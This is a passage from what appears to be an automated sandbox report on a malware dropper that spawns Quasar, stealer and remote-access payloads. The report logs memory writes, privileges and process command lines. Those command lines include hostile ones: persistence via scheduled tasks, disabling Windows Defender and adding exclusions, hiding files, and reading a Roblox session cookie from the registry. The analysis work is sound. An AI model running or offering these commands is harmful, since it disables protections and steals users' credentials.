Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 1808 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 2920 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1456 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 2844 wrote to memory of 3048 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\client.exe
PID 2844 wrote to memory of 3048 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\client.exe
PID 3048 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3048 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3048 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1352 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 4584 wrote to memory of 3104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 4584 wrote to memory of 3104 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 3104 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3104 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 2792 wrote to memory of 404 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
PID 2792 wrote to memory of 404 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3104 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 1988 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\svchost.com
PID 2816 wrote to memory of 396 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 2816 wrote to memory of 396 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe
PID 404 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\SYSTEM32\schtasks.exe
PID 404 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\SYSTEM32\schtasks.exe
PID 404 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\system32\SubDir\Client.exe
PID 404 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe C:\Windows\system32\SubDir\Client.exe
PID 396 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 396 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 396 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 396 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
PID 3020 wrote to memory of 4420 N/A C:\Windows\system32\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3020 wrote to memory of 4420 N/A C:\Windows\system32\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1992 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1992 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1692 wrote to memory of 1792 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
PID 1692 wrote to memory of 1792 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 4540 wrote to memory of 1564 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
PID 4540 wrote to memory of 1564 N/A C:\Windows\svchost.com C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com
PID 1808 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Windows\svchost.com

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\client.exe"

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

C:\Users\Admin\AppData\Local\Temp\Files\client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe"

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe" /rl HIGHEST /f

C:\Windows\system32\SubDir\Client.exe

"C:\Windows\system32\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

C:\Users\Admin\AppData\Local\Temp\Files\winn.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CRYPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

C:\Users\Admin\AppData\Local\Temp\Files\random.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

C:\Users\Admin\AppData\Local\Temp\Files\m.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch

C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\2946613613.exe

C:\Users\Admin\AppData\Local\Temp\2946613613.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SysWOW64\reg.exe

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /delete /f /tn Windows Upgrade Manager

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\248483651.exe

C:\Users\Admin\AppData\Local\Temp\248483651.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE

C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

C:\Users\Admin\AppData\Local\Temp\322341857.exe

C:\Users\Admin\AppData\Local\Temp\322341857.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe

"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\2767925072.exe

C:\Users\Admin\AppData\Local\Temp\2767925072.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\2928124777.exe

C:\Users\Admin\AppData\Local\Temp\2928124777.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE

C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"

C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe

C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\svchost.com

